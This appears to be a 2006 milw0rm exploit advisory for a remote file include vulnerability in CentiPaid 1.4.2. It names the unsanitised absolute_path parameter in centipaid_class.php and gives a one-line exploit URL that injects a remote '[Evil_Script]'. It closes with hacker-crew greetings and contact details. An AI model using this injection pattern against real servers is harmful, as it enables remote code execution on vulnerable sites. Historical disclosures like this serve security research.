1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 CentiPaid <= 1.4.2 [absolute_path] Remote File Include Vulnerability
3 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
4
5
6 Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST−CREW.net :
7 Remote : Yes
8 Critical Level : Dangerous
9 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
10
11 Affected software description :
12 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
13 Application : CentiPaid
14 version : 1.4.2
15 URL : http://www.centipaid.com/centi/download/centipaid_php−1.4.2.tar.gz
16 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
17
18
19 Exploit:
20 ~~~~~~~~
21 Variable $absolute_path not sanitized.When register_globals=on an attacker ca
22 n exploit this vulnerability with a simple php injection script.
23
24 # http://www.site.com/[path]/centipaid_class.php?absolute_path=[Evil_Script]
25 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
26
27 Shoutz:
28 ~~~~~~~
29
30 # Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker,
SpiridusuCaddy and sysghost !]
31 # To all members of #h4cky0u and RST [ hTTp://RST−CREW.net ]
32 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
33
34 */
35
36 Contact:
37 ~~~~
38
39 Nick: Kw3rLn
40 E−mail: ciriboflacs[at]YaHoo[dot]Com
41 Homepage: hTTp://RST−CREW.NET
42 __/*
43
44 # milw0rm.com [2006−10−14]
Page 1/1
CentiPaid 1.4.2 centipaid_class.php Remote File Include Vulnerability
Kw3[R]Ln
10/14/2006